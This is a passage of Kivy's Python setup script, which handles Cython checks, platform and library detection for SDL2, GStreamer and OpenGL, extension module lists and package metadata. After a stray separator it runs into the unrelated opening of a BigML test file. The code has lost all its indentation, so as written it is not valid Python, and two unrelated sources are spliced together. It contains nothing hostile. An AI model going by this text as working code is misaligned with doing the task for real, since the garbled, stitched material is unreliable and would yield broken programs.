value = bool(int(environ[ukey]))
print('Environ change {0} -> {1}'.format(key, value))
c_options[key] = value
# -----------------------------------------------------------------------------
# Cython check
# on python-for-android and kivy-ios, cython usage is external
cython_unsupported_append = '''
Please note that the following versions of Cython are not supported
at all: {}
'''.format(', '.join(map(str, CYTHON_UNSUPPORTED)))
cython_min = '''\
This version of Cython is not compatible with Kivy. Please upgrade to
at least version {0}, preferably the newest supported version {1}.
If your platform provides a Cython package, make sure you have upgraded
to the newest version. If the newest version available is still too low,
please remove it and install the newest supported Cython via pip:
pip install -I Cython=={1}{2}\
'''.format(MIN_CYTHON_STRING, MAX_CYTHON_STRING,
cython_unsupported_append if CYTHON_UNSUPPORTED else '')
cython_max = '''\
This version of Cython is untested with Kivy. While this version may
work perfectly fine, it is possible that you may experience issues. If
you do have issues, please downgrade to a supported version. It is
best to use the newest supported version, {1}, but the minimum
supported version is {0}.
If your platform provides a Cython package, check if you can downgrade
to a supported version. Otherwise, uninstall the platform package and
install Cython via pip:
pip install -I Cython=={1}{2}\
'''.format(MIN_CYTHON_STRING, MAX_CYTHON_STRING,
cython_unsupported_append if CYTHON_UNSUPPORTED else '')
cython_unsupported = '''\
This version of Cython suffers from known bugs and is unsupported.
Please install the newest supported version, {1}, if possible, but
the minimum supported version is {0}.
If your platform provides a Cython package, check if you can install
a supported version. Otherwise, uninstall the platform package and
install Cython via pip:
pip install -I Cython=={1}{2}\
'''.format(MIN_CYTHON_STRING, MAX_CYTHON_STRING,
cython_unsupported_append)
have_cython = False
skip_cython = False
if platform in ('ios', 'android'):
print('\nCython check avoided.')
skip_cython = True
else:
try:
# check for cython
from Cython.Distutils import build_ext
have_cython = True
import Cython
cy_version_str = Cython.__version__
cy_ver = LooseVersion(cy_version_str)
print('\nDetected Cython version {}'.format(cy_version_str))
if cy_ver < MIN_CYTHON_VERSION:
print(cython_min)
raise ImportError('Incompatible Cython Version')
if cy_ver in CYTHON_UNSUPPORTED:
print(cython_unsupported)
raise ImportError('Incompatible Cython Version')
if cy_ver > MAX_CYTHON_VERSION:
print(cython_max)
sleep(1)
except ImportError:
        print("\nCython is missing, it's required for compiling Kivy!\n\n")
raise
if not have_cython:
from distutils.command.build_ext import build_ext
# -----------------------------------------------------------------------------
# Setup classes
# the build path where kivy is being compiled
src_path = build_path = dirname(__file__)
class KivyBuildExt(build_ext):
def finalize_options(self):
retval = build_ext.finalize_options(self)
global build_path
if (self.build_lib is not None and exists(self.build_lib) and
not self.inplace):
build_path = self.build_lib
return retval
def build_extensions(self):
# build files
config_h_fn = ('include', 'config.h')
config_pxi_fn = ('include', 'config.pxi')
config_py_fn = ('setupconfig.py', )
# generate headers
config_h = '// Autogenerated file for Kivy C configuration\n'
config_h += '#define __PY3 {0}\n'.format(int(PY3))
config_pxi = '# Autogenerated file for Kivy Cython configuration\n'
config_pxi += 'DEF PY3 = {0}\n'.format(int(PY3))
config_py = '# Autogenerated file for Kivy configuration\n'
config_py += 'PY3 = {0}\n'.format(int(PY3))
config_py += 'CYTHON_MIN = {0}\nCYTHON_MAX = {1}\n'.format(
repr(MIN_CYTHON_STRING), repr(MAX_CYTHON_STRING))
config_py += 'CYTHON_BAD = {0}\n'.format(repr(', '.join(map(
str, CYTHON_UNSUPPORTED))))
# generate content
print('Build configuration is:')
for opt, value in c_options.items():
value = int(bool(value))
print(' * {0} = {1}'.format(opt, value))
opt = opt.upper()
config_h += '#define __{0} {1}\n'.format(opt, value)
config_pxi += 'DEF {0} = {1}\n'.format(opt, value)
config_py += '{0} = {1}\n'.format(opt, value)
debug = bool(self.debug)
print(' * debug = {0}'.format(debug))
config_pxi += 'DEF DEBUG = {0}\n'.format(debug)
config_py += 'DEBUG = {0}\n'.format(debug)
config_pxi += 'DEF PLATFORM = "{0}"\n'.format(platform)
config_py += 'PLATFORM = "{0}"\n'.format(platform)
for fn, content in (
(config_h_fn, config_h), (config_pxi_fn, config_pxi),
(config_py_fn, config_py)):
build_fn = expand(build_path, *fn)
if self.update_if_changed(build_fn, content):
print('Updated {}'.format(build_fn))
src_fn = expand(src_path, *fn)
if src_fn != build_fn and self.update_if_changed(src_fn, content):
print('Updated {}'.format(src_fn))
c = self.compiler.compiler_type
print('Detected compiler is {}'.format(c))
if c != 'msvc':
for e in self.extensions:
e.extra_link_args += ['-lm']
build_ext.build_extensions(self)
def update_if_changed(self, fn, content):
need_update = True
if exists(fn):
with open(fn) as fd:
need_update = fd.read() != content
if need_update:
with open(fn, 'w') as fd:
fd.write(content)
return need_update
def _check_and_fix_sdl2_mixer(f_path):
    print("Check if SDL2_mixer smpeg2 has an @executable_path")
rpath_from = ("@executable_path/../Frameworks/SDL2.framework"
"/Versions/A/SDL2")
rpath_to = "@rpath/../../../../SDL2.framework/Versions/A/SDL2"
smpeg2_path = ("{}/Versions/A/Frameworks/smpeg2.framework"
"/Versions/A/smpeg2").format(f_path)
output = getoutput(("otool -L '{}'").format(smpeg2_path)).decode('utf-8')
if "@executable_path" not in output:
return
print("WARNING: Your SDL2_mixer version is invalid")
print("WARNING: The smpeg2 framework embedded in SDL2_mixer contains a")
print("WARNING: reference to @executable_path that will fail the")
print("WARNING: execution of your application.")
print("WARNING: We are going to change:")
print("WARNING: from: {}".format(rpath_from))
print("WARNING: to: {}".format(rpath_to))
getoutput("install_name_tool -change {} {} {}".format(
rpath_from, rpath_to, smpeg2_path))
output = getoutput(("otool -L '{}'").format(smpeg2_path))
if b"@executable_path" not in output:
print("WARNING: Change successfully applied!")
print("WARNING: You'll never see this message again.")
else:
print("WARNING: Unable to apply the changes, sorry.")
# -----------------------------------------------------------------------------
# extract version (simulate doc generation, kivy will not be imported)
environ['KIVY_DOC_INCLUDE'] = '1'
import kivy
# extra build commands go in the cmdclass dict {'command-name': CommandClass}
# see tools.packaging.{platform}.build.py for custom build commands for
# portable packages. Also e.g. we use build_ext command from cython if it's
# installed for c extensions.
from kivy.tools.packaging.factory import FactoryBuild
cmdclass = {
'build_factory': FactoryBuild,
'build_ext': KivyBuildExt}
try:
# add build rules for portable packages to cmdclass
if platform == 'win32':
from kivy.tools.packaging.win32.build import WindowsPortableBuild
cmdclass['build_portable'] = WindowsPortableBuild
elif platform == 'darwin':
from kivy.tools.packaging.osx.build import OSXPortableBuild
cmdclass['build_portable'] = OSXPortableBuild
except ImportError:
print('User distribution detected, avoid portable command.')
# Detect which opengl version headers to use
if platform in ('android', 'darwin', 'ios', 'rpi', 'mali'):
c_options['use_opengl_es2'] = True
elif c_options['use_opengl_es2'] is None:
c_options['use_opengl_es2'] = \
environ.get('KIVY_GRAPHICS', '').lower() == 'gles'
print('Using this graphics system: {}'.format(
['OpenGL', 'OpenGL ES 2'][int(c_options['use_opengl_es2'] or False)]))
# check if we are in a kivy-ios build
if platform == 'ios':
    print('Kivy-IOS project environment detected, using it.')
print('Kivy-IOS project located at {0}'.format(kivy_ios_root))
c_options['use_ios'] = True
c_options['use_sdl2'] = True
elif platform == 'darwin':
if c_options['use_osx_frameworks']:
if osx_arch == "i386":
            print("Warning: building with frameworks fails on i386")
else:
print("OSX framework used, force to x86_64 only")
environ["ARCHFLAGS"] = environ.get("ARCHFLAGS", "-arch x86_64")
print("OSX ARCHFLAGS are: {}".format(environ["ARCHFLAGS"]))
# detect gstreamer, only on desktop
# works if we forced the options or in autodetection
if platform not in ('ios', 'android') and (c_options['use_gstreamer']
in (None, True)):
if c_options['use_osx_frameworks'] and platform == 'darwin':
# check the existence of frameworks
f_path = '/Library/Frameworks/GStreamer.framework'
if not exists(f_path):
c_options['use_gstreamer'] = False
print('Missing GStreamer framework {}'.format(f_path))
else:
c_options['use_gstreamer'] = True
gst_flags = {
'extra_link_args': [
'-F/Library/Frameworks',
'-Xlinker', '-rpath',
'-Xlinker', '/Library/Frameworks',
'-Xlinker', '-headerpad',
'-Xlinker', '190',
'-framework', 'GStreamer'],
'include_dirs': [join(f_path, 'Headers')]}
else:
# use pkg-config approach instead
gst_flags = pkgconfig('gstreamer-1.0')
if 'libraries' in gst_flags:
c_options['use_gstreamer'] = True
# detect SDL2, only on desktop and iOS, or android if explicitly enabled
# works if we forced the options or in autodetection
sdl2_flags = {}
if c_options['use_sdl2'] or (
platform not in ('android',) and c_options['use_sdl2'] is None):
if c_options['use_osx_frameworks'] and platform == 'darwin':
# check the existence of frameworks
sdl2_valid = True
sdl2_flags = {
'extra_link_args': [
'-F/Library/Frameworks',
'-Xlinker', '-rpath',
'-Xlinker', '/Library/Frameworks',
'-Xlinker', '-headerpad',
'-Xlinker', '190'],
'include_dirs': [],
'extra_compile_args': ['-F/Library/Frameworks']
}
for name in ('SDL2', 'SDL2_ttf', 'SDL2_image', 'SDL2_mixer'):
f_path = '/Library/Frameworks/{}.framework'.format(name)
if not exists(f_path):
print('Missing framework {}'.format(f_path))
sdl2_valid = False
continue
sdl2_flags['extra_link_args'] += ['-framework', name]
sdl2_flags['include_dirs'] += [join(f_path, 'Headers')]
print('Found sdl2 frameworks: {}'.format(f_path))
if name == 'SDL2_mixer':
_check_and_fix_sdl2_mixer(f_path)
if not sdl2_valid:
c_options['use_sdl2'] = False
print('Deactivate SDL2 compilation due to missing frameworks')
else:
c_options['use_sdl2'] = True
print('Activate SDL2 compilation')
elif platform != "ios":
# use pkg-config approach instead
sdl2_flags = pkgconfig('sdl2', 'SDL2_ttf', 'SDL2_image', 'SDL2_mixer')
if 'libraries' in sdl2_flags:
c_options['use_sdl2'] = True
# -----------------------------------------------------------------------------
# declare flags
def get_modulename_from_file(filename):
filename = filename.replace(sep, '/')
pyx = '.'.join(filename.split('.')[:-1])
pyxl = pyx.split('/')
while pyxl[0] != 'kivy':
pyxl.pop(0)
if pyxl[1] == 'kivy':
pyxl.pop(0)
return '.'.join(pyxl)
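# Illustrative note (not part of the original setup script): for a file such as
# 'kivy/graphics/vbo.pyx', get_modulename_from_file() drops the extension and
# everything before the first 'kivy' path component and returns
# 'kivy.graphics.vbo'.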
def expand(root, *args):
return join(root, 'kivy', *args)
class CythonExtension(Extension):
def __init__(self, *args, **kwargs):
Extension.__init__(self, *args, **kwargs)
self.cython_directives = {
'c_string_encoding': 'utf-8',
'profile': 'USE_PROFILE' in environ,
'embedsignature': 'USE_EMBEDSIGNATURE' in environ}
        # XXX with pip, setuptools is imported before distutils and changes
        # our .pyx files to .c, so cythonize doesn't happen. Force our
        # sources again.
self.sources = args[1]
def merge(d1, *args):
d1 = deepcopy(d1)
for d2 in args:
for key, value in d2.items():
value = deepcopy(value)
if key in d1:
d1[key].extend(value)
else:
d1[key] = value
return d1
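# Illustrative note (not part of the original setup script): merge() deep-copies
# its inputs and extends list values key by key, so
#   merge({'libraries': ['GL']},
#         {'libraries': ['m'], 'include_dirs': ['/usr/include']})
# returns {'libraries': ['GL', 'm'], 'include_dirs': ['/usr/include']}
# without mutating either argument.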
def determine_base_flags():
flags = {
'libraries': [],
'include_dirs': [join(src_path, 'kivy', 'include')],
'library_dirs': [],
'extra_link_args': [],
'extra_compile_args': []}
if c_options['use_ios']:
sysroot = environ.get('IOSSDKROOT', environ.get('SDKROOT'))
if not sysroot:
raise Exception('IOSSDKROOT is not set')
flags['include_dirs'] += [sysroot]
flags['extra_compile_args'] += ['-isysroot', sysroot]
flags['extra_link_args'] += ['-isysroot', sysroot]
elif platform.startswith('freebsd'):
flags['include_dirs'] += [join(
environ.get('LOCALBASE', '/usr/local'), 'include')]
flags['library_dirs'] += [join(
environ.get('LOCALBASE', '/usr/local'), 'lib')]
elif platform == 'darwin':
v = os.uname()
if v[2] >= '13.0.0':
# use xcode-select to search on the right Xcode path
# XXX use the best SDK available instead of a specific one
import platform as _platform
xcode_dev = getoutput('xcode-select -p').splitlines()[0]
sdk_mac_ver = '.'.join(_platform.mac_ver()[0].split('.')[:2])
print('Xcode detected at {}, and using OS X{} sdk'.format(
xcode_dev, sdk_mac_ver))
sysroot = join(
xcode_dev.decode('utf-8'),
'Platforms/MacOSX.platform/Developer/SDKs',
'MacOSX{}.sdk'.format(sdk_mac_ver),
'System/Library/Frameworks')
else:
sysroot = ('/System/Library/Frameworks/'
'ApplicationServices.framework/Frameworks')
flags['extra_compile_args'] += ['-F%s' % sysroot]
flags['extra_link_args'] += ['-F%s' % sysroot]
elif platform == 'win32':
flags['include_dirs'] += [get_python_inc(prefix=sys.prefix)]
flags['library_dirs'] += [join(sys.prefix, "libs")]
return flags
def determine_gl_flags():
kivy_graphics_include = join(src_path, 'kivy', 'include')
flags = {'include_dirs': [kivy_graphics_include], 'libraries': []}
base_flags = {'include_dirs': [kivy_graphics_include], 'libraries': []}
if c_options['use_opengl_mock']:
return flags, base_flags
if platform == 'win32':
flags['libraries'] = ['opengl32', 'glew32']
elif platform == 'ios':
flags['libraries'] = ['GLESv2']
flags['extra_link_args'] = ['-framework', 'OpenGLES']
elif platform == 'darwin':
flags['extra_link_args'] = ['-framework', 'OpenGL', '-arch', osx_arch]
flags['extra_compile_args'] = ['-arch', osx_arch]
elif platform.startswith('freebsd'):
flags['libraries'] = ['GL']
elif platform.startswith('openbsd'):
flags['include_dirs'] = ['/usr/X11R6/include']
flags['library_dirs'] = ['/usr/X11R6/lib']
flags['libraries'] = ['GL']
elif platform == 'android':
flags['include_dirs'] = [join(ndkplatform, 'usr', 'include')]
flags['library_dirs'] = [join(ndkplatform, 'usr', 'lib')]
flags['libraries'] = ['GLESv2']
elif platform == 'rpi':
flags['include_dirs'] = [
'/opt/vc/include',
'/opt/vc/include/interface/vcos/pthreads',
'/opt/vc/include/interface/vmcs_host/linux']
flags['library_dirs'] = ['/opt/vc/lib']
flags['libraries'] = ['bcm_host', 'EGL', 'GLESv2']
elif platform == 'mali':
flags['include_dirs'] = ['/usr/include/']
flags['library_dirs'] = ['/usr/lib/arm-linux-gnueabihf']
flags['libraries'] = ['GLESv2']
c_options['use_x11'] = True
c_options['use_egl'] = True
else:
flags['libraries'] = ['GL']
return flags, base_flags
def determine_sdl2():
flags = {}
if not c_options['use_sdl2']:
return flags
sdl2_path = environ.get('KIVY_SDL2_PATH', None)
if sdl2_flags and not sdl2_path and platform == 'darwin':
return sdl2_flags
# no pkgconfig info, or we want to use a specific sdl2 path, so perform
# manual configuration
flags['libraries'] = ['SDL2', 'SDL2_ttf', 'SDL2_image', 'SDL2_mixer']
split_chr = ';' if platform == 'win32' else ':'
sdl2_paths = sdl2_path.split(split_chr) if sdl2_path else []
if not sdl2_paths:
sdl_inc = join(sys.prefix, 'include', 'SDL2')
if isdir(sdl_inc):
sdl2_paths = [sdl_inc]
sdl2_paths.extend(['/usr/local/include/SDL2', '/usr/include/SDL2'])
flags['include_dirs'] = sdl2_paths
flags['extra_link_args'] = []
flags['extra_compile_args'] = []
flags['library_dirs'] = (
sdl2_paths if sdl2_paths else
['/usr/local/lib/'])
if sdl2_flags:
flags = merge(flags, sdl2_flags)
# ensure headers for all the SDL2 and sub libraries are available
libs_to_check = ['SDL', 'SDL_mixer', 'SDL_ttf', 'SDL_image']
can_compile = True
for lib in libs_to_check:
found = False
for d in flags['include_dirs']:
fn = join(d, '{}.h'.format(lib))
if exists(fn):
found = True
print('SDL2: found {} header at {}'.format(lib, fn))
break
if not found:
print('SDL2: missing sub library {}'.format(lib))
can_compile = False
if not can_compile:
c_options['use_sdl2'] = False
return {}
return flags
base_flags = determine_base_flags()
gl_flags, gl_flags_base = determine_gl_flags()
# -----------------------------------------------------------------------------
# sources to compile
# all the dependencies have been found manually with:
# grep -inr -E '(cimport|include)' kivy/graphics/context_instructions.{pxd,pyx}
graphics_dependencies = {
'gl_redirect.h': ['common_subset.h', 'gl_mock.h'],
'buffer.pyx': ['common.pxi'],
'context.pxd': ['instructions.pxd', 'texture.pxd', 'vbo.pxd', 'cgl.pxd'],
'cgl.pxd': ['common.pxi', 'config.pxi', 'gl_redirect.h'],
'compiler.pxd': ['instructions.pxd'],
'compiler.pyx': ['context_instructions.pxd'],
'cgl.pyx': ['cgl.pxd'],
'cgl_mock.pyx': ['cgl.pxd'],
'cgl_sdl2.pyx': ['cgl.pxd'],
'cgl_gl.pyx': ['cgl.pxd'],
'cgl_glew.pyx': ['cgl.pxd'],
'context_instructions.pxd': [
'transformation.pxd', 'instructions.pxd', 'texture.pxd'],
'fbo.pxd': ['cgl.pxd', 'instructions.pxd', 'texture.pxd'],
'fbo.pyx': [
'config.pxi', 'opcodes.pxi', 'transformation.pxd', 'context.pxd'],
'gl_instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd', 'instructions.pxd'],
'instructions.pxd': [
'vbo.pxd', 'context_instructions.pxd', 'compiler.pxd', 'shader.pxd',
'texture.pxd', '../_event.pxd'],
'instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd',
'context.pxd', 'common.pxi', 'vertex.pxd', 'transformation.pxd'],
'opengl.pyx': [
'config.pxi', 'common.pxi', 'cgl.pxd', 'gl_redirect.h'],
'opengl_utils.pyx': [
'opengl_utils_def.pxi', 'cgl.pxd', ],
'shader.pxd': ['cgl.pxd', 'transformation.pxd', 'vertex.pxd'],
'shader.pyx': [
'config.pxi', 'common.pxi', 'cgl.pxd',
'vertex.pxd', 'transformation.pxd', 'context.pxd',
'gl_debug_logger.pxi'],
'stencil_instructions.pxd': ['instructions.pxd'],
'stencil_instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd',
'gl_debug_logger.pxi'],
'scissor_instructions.pyx': [
'config.pxi', 'opcodes.pxi', 'cgl.pxd'],
'svg.pyx': ['config.pxi', 'common.pxi', 'texture.pxd', 'instructions.pxd',
'vertex_instructions.pxd', 'tesselator.pxd'],
'texture.pxd': ['cgl.pxd'],
'texture.pyx': [
'config.pxi', 'common.pxi', 'opengl_utils_def.pxi', 'context.pxd',
'cgl.pxd', 'opengl_utils.pxd',
'img_tools.pxi', 'gl_debug_logger.pxi'],
'vbo.pxd': ['buffer.pxd', 'cgl.pxd', 'vertex.pxd'],
'vbo.pyx': [
'config.pxi', 'common.pxi', 'context.pxd',
'instructions.pxd', 'shader.pxd', 'gl_debug_logger.pxi'],
'vertex.pxd': ['cgl.pxd'],
'vertex.pyx': ['config.pxi', 'common.pxi'],
'vertex_instructions.pyx': [
'config.pxi', 'common.pxi', 'vbo.pxd', 'vertex.pxd',
'instructions.pxd', 'vertex_instructions.pxd',
'cgl.pxd', 'texture.pxd', 'vertex_instructions_line.pxi'],
'vertex_instructions_line.pxi': ['stencil_instructions.pxd']}
sources = {
'_event.pyx': merge(base_flags, {'depends': ['properties.pxd']}),
'_clock.pyx': {},
'weakproxy.pyx': {},
'properties.pyx': merge(base_flags, {'depends': ['_event.pxd']}),
'graphics/buffer.pyx': merge(base_flags, gl_flags_base),
'graphics/context.pyx': merge(base_flags, gl_flags_base),
'graphics/compiler.pyx': merge(base_flags, gl_flags_base),
'graphics/context_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/fbo.pyx': merge(base_flags, gl_flags_base),
'graphics/gl_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/opengl.pyx': merge(base_flags, gl_flags_base),
'graphics/opengl_utils.pyx': merge(base_flags, gl_flags_base),
'graphics/shader.pyx': merge(base_flags, gl_flags_base),
'graphics/stencil_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/scissor_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/texture.pyx': merge(base_flags, gl_flags_base),
'graphics/transformation.pyx': merge(base_flags, gl_flags_base),
'graphics/vbo.pyx': merge(base_flags, gl_flags_base),
'graphics/vertex.pyx': merge(base_flags, gl_flags_base),
'graphics/vertex_instructions.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl_backend/cgl_mock.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl_backend/cgl_gl.pyx': merge(base_flags, gl_flags),
'graphics/cgl_backend/cgl_glew.pyx': merge(base_flags, gl_flags),
'graphics/cgl_backend/cgl_sdl2.pyx': merge(base_flags, gl_flags_base),
'graphics/cgl_backend/cgl_debug.pyx': merge(base_flags, gl_flags_base),
'core/text/text_layout.pyx': base_flags,
'graphics/tesselator.pyx': merge(base_flags, {
'include_dirs': ['kivy/lib/libtess2/Include'],
'c_depends': [
'lib/libtess2/Source/bucketalloc.c',
'lib/libtess2/Source/dict.c',
'lib/libtess2/Source/geom.c',
'lib/libtess2/Source/mesh.c',
'lib/libtess2/Source/priorityq.c',
'lib/libtess2/Source/sweep.c',
'lib/libtess2/Source/tess.c'
]
}),
'graphics/svg.pyx': merge(base_flags, gl_flags_base)
}
if c_options["use_sdl2"]:
sdl2_flags = determine_sdl2()
if c_options['use_sdl2'] and sdl2_flags:
sources['graphics/cgl_backend/cgl_sdl2.pyx'] = merge(
sources['graphics/cgl_backend/cgl_sdl2.pyx'], sdl2_flags)
sdl2_depends = {'depends': ['lib/sdl2.pxi']}
for source_file in ('core/window/_window_sdl2.pyx',
'core/image/_img_sdl2.pyx',
'core/text/_text_sdl2.pyx',
'core/audio/audio_sdl2.pyx',
'core/clipboard/_clipboard_sdl2.pyx'):
sources[source_file] = merge(
base_flags, sdl2_flags, sdl2_depends)
if platform in ('darwin', 'ios'):
# activate ImageIO provider for our core image
if platform == 'ios':
osx_flags = {'extra_link_args': [
'-framework', 'Foundation',
'-framework', 'UIKit',
'-framework', 'AudioToolbox',
'-framework', 'CoreGraphics',
'-framework', 'QuartzCore',
'-framework', 'ImageIO',
'-framework', 'Accelerate']}
else:
osx_flags = {'extra_link_args': [
'-framework', 'ApplicationServices']}
sources['core/image/img_imageio.pyx'] = merge(
base_flags, osx_flags)
if c_options['use_avfoundation']:
import platform as _platform
mac_ver = [int(x) for x in _platform.mac_ver()[0].split('.')[:2]]
if mac_ver >= [10, 7]:
osx_flags = {
'extra_link_args': ['-framework', 'AVFoundation'],
'extra_compile_args': ['-ObjC++'],
'depends': ['core/camera/camera_avfoundation_implem.m']}
sources['core/camera/camera_avfoundation.pyx'] = merge(
base_flags, osx_flags)
else:
print('AVFoundation cannot be used, OSX >= 10.7 is required')
if c_options['use_rpi']:
sources['lib/vidcore_lite/egl.pyx'] = merge(
base_flags, gl_flags)
sources['lib/vidcore_lite/bcm.pyx'] = merge(
base_flags, gl_flags)
if c_options['use_x11']:
libs = ['Xrender', 'X11']
if c_options['use_egl']:
libs += ['EGL']
else:
libs += ['GL']
sources['core/window/window_x11.pyx'] = merge(
base_flags, gl_flags, {
# FIXME add an option to depend on them but not compile them
# cause keytab is included in core, and core is included in
# window_x11
#
# 'depends': [
# 'core/window/window_x11_keytab.c',
# 'core/window/window_x11_core.c'],
'libraries': libs})
if c_options['use_gstreamer']:
sources['lib/gstplayer/_gstplayer.pyx'] = merge(
base_flags, gst_flags, {
'depends': ['lib/gstplayer/_gstplayer.h']})
# -----------------------------------------------------------------------------
# extension modules
def get_dependencies(name, deps=None):
if deps is None:
deps = []
for dep in graphics_dependencies.get(name, []):
if dep not in deps:
deps.append(dep)
get_dependencies(dep, deps)
return deps
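# Illustrative note (not part of the original setup script): get_dependencies()
# expands graphics_dependencies transitively, e.g. for 'compiler.pyx' it adds
# 'context_instructions.pxd', then that entry's own dependencies
# ('transformation.pxd', 'instructions.pxd', 'texture.pxd'), and so on; the
# `dep not in deps` check keeps the recursion from looping on cyclic entries.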
def resolve_dependencies(fn, depends):
fn = basename(fn)
deps = []
get_dependencies(fn, deps)
get_dependencies(fn.replace('.pyx', '.pxd'), deps)
return [expand(src_path, 'graphics', x) for x in deps]
def get_extensions_from_sources(sources):
ext_modules = []
if environ.get('KIVY_FAKE_BUILDEXT'):
print('Fake build_ext asked, will generate only .h/.c')
return ext_modules
for pyx, flags in sources.items():
is_graphics = pyx.startswith('graphics')
pyx = expand(src_path, pyx)
depends = [expand(src_path, x) for x in flags.pop('depends', [])]
c_depends = [expand(src_path, x) for x in flags.pop('c_depends', [])]
if not have_cython:
pyx = '%s.c' % pyx[:-4]
if is_graphics:
depends = resolve_dependencies(pyx, depends)
f_depends = [x for x in depends if x.rsplit('.', 1)[-1] in (
'c', 'cpp', 'm')]
module_name = get_modulename_from_file(pyx)
flags_clean = {'depends': depends}
for key, value in flags.items():
if len(value):
flags_clean[key] = value
ext_modules.append(CythonExtension(
module_name, [pyx] + f_depends + c_depends, **flags_clean))
return ext_modules
ext_modules = get_extensions_from_sources(sources)
# -----------------------------------------------------------------------------
# automatically detect data files
split_examples = int(environ.get('KIVY_SPLIT_EXAMPLES', '0'))
data_file_prefix = 'share/kivy-'
examples = {}
examples_allowed_ext = ('readme', 'py', 'wav', 'png', 'jpg', 'svg', 'json',
'avi', 'gif', 'txt', 'ttf', 'obj', 'mtl', 'kv', 'mpg',
'glsl', 'zip')
for root, subFolders, files in walk('examples'):
for fn in files:
ext = fn.split('.')[-1].lower()
if ext not in examples_allowed_ext:
continue
filename = join(root, fn)
directory = '%s%s' % (data_file_prefix, dirname(filename))
if directory not in examples:
examples[directory] = []
examples[directory].append(filename)
binary_deps = []
binary_deps_path = join(src_path, 'kivy', 'binary_deps')
if isdir(binary_deps_path):
for root, dirnames, filenames in walk(binary_deps_path):
for fname in filenames:
binary_deps.append(
join(root.replace(binary_deps_path, 'binary_deps'), fname))
# -----------------------------------------------------------------------------
# setup !
if not build_examples:
setup(
name='Kivy',
version=get_version(),
author='Kivy Team and other contributors',
author_email='[email protected]',
url='http://kivy.org',
license='MIT',
description=(
'A software library for rapid development of '
'hardware-accelerated multitouch applications.'),
ext_modules=ext_modules,
cmdclass=cmdclass,
packages=[
'kivy',
'kivy.adapters',
'kivy.core',
'kivy.core.audio',
'kivy.core.camera',
'kivy.core.clipboard',
'kivy.core.image',
'kivy.core.gl',
'kivy.core.spelling',
'kivy.core.text',
'kivy.core.video',
'kivy.core.window',
'kivy.deps',
'kivy.effects',
'kivy.graphics',
'kivy.graphics.cgl_backend',
'kivy.garden',
'kivy.input',
'kivy.input.postproc',
'kivy.input.providers',
'kivy.lang',
'kivy.lib',
'kivy.lib.osc',
'kivy.lib.gstplayer',
'kivy.lib.vidcore_lite',
'kivy.modules',
'kivy.network',
'kivy.storage',
'kivy.tests',
'kivy.tools',
'kivy.tools.packaging',
'kivy.tools.packaging.pyinstaller_hooks',
'kivy.tools.highlight',
'kivy.extras',
'kivy.uix',
'kivy.uix.behaviors',
'kivy.uix.recycleview',
],
package_dir={'kivy': 'kivy'},
package_data={'kivy': [
'*.pxd',
'*.pxi',
'core/text/*.pxd',
'core/text/*.pxi',
'graphics/*.pxd',
'graphics/*.pxi',
'graphics/*.h',
'include/*',
'lib/vidcore_lite/*.pxd',
'lib/vidcore_lite/*.pxi',
'data/*.kv',
'data/*.json',
'data/fonts/*.ttf',
'data/images/*.png',
'data/images/*.jpg',
'data/images/*.gif',
'data/images/*.atlas',
'data/keyboards/*.json',
'data/logo/*.png',
'data/glsl/*.png',
'data/glsl/*.vs',
'data/glsl/*.fs',
'tests/*.zip',
'tests/*.kv',
'tests/*.png',
'tests/*.ttf',
'tests/*.ogg',
'tools/highlight/*.vim',
'tools/highlight/*.el',
'tools/packaging/README.txt',
'tools/packaging/win32/kivy.bat',
'tools/packaging/win32/kivyenv.sh',
'tools/packaging/win32/README.txt',
'tools/packaging/osx/Info.plist',
'tools/packaging/osx/InfoPlist.strings',
'tools/gles_compat/*.h',
'tools/packaging/osx/kivy.sh'] + binary_deps},
data_files=[] if split_examples else list(examples.items()),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: MacOS X',
'Environment :: Win32 (MS Windows)',
'Environment :: X11 Applications',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Artistic Software',
'Topic :: Games/Entertainment',
'Topic :: Multimedia :: Graphics :: 3D Rendering',
'Topic :: Multimedia :: Graphics :: Capture :: Digital Camera',
'Topic :: Multimedia :: Graphics :: Presentation',
'Topic :: Multimedia :: Graphics :: Viewers',
'Topic :: Multimedia :: Sound/Audio :: Players :: MP3',
'Topic :: Multimedia :: Video :: Display',
'Topic :: Scientific/Engineering :: Human Machine Interfaces',
'Topic :: Scientific/Engineering :: Visualization',
('Topic :: Software Development :: Libraries :: '
'Application Frameworks'),
'Topic :: Software Development :: User Interfaces'],
dependency_links=[
'https://github.com/kivy-garden/garden/archive/master.zip'],
install_requires=['Kivy-Garden>=0.1.4', 'docutils', 'pygments'],
setup_requires=[
'cython>=' + MIN_CYTHON_STRING
] if not skip_cython else [])
else:
setup(
name='Kivy-examples',
version=get_version(),
author='Kivy Team and other contributors',
author_email='[email protected]',
url='http://kivy.org',
license='MIT',
description=('Kivy examples.'),
data_files=list(examples.items()))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import json
import requests
import csv
import traceback
from datetime import datetime, timedelta
from world import world, res_filename
from bigml.api import HTTP_CREATED
from bigml.api import FINISHED
from bigml.api import FAULTY
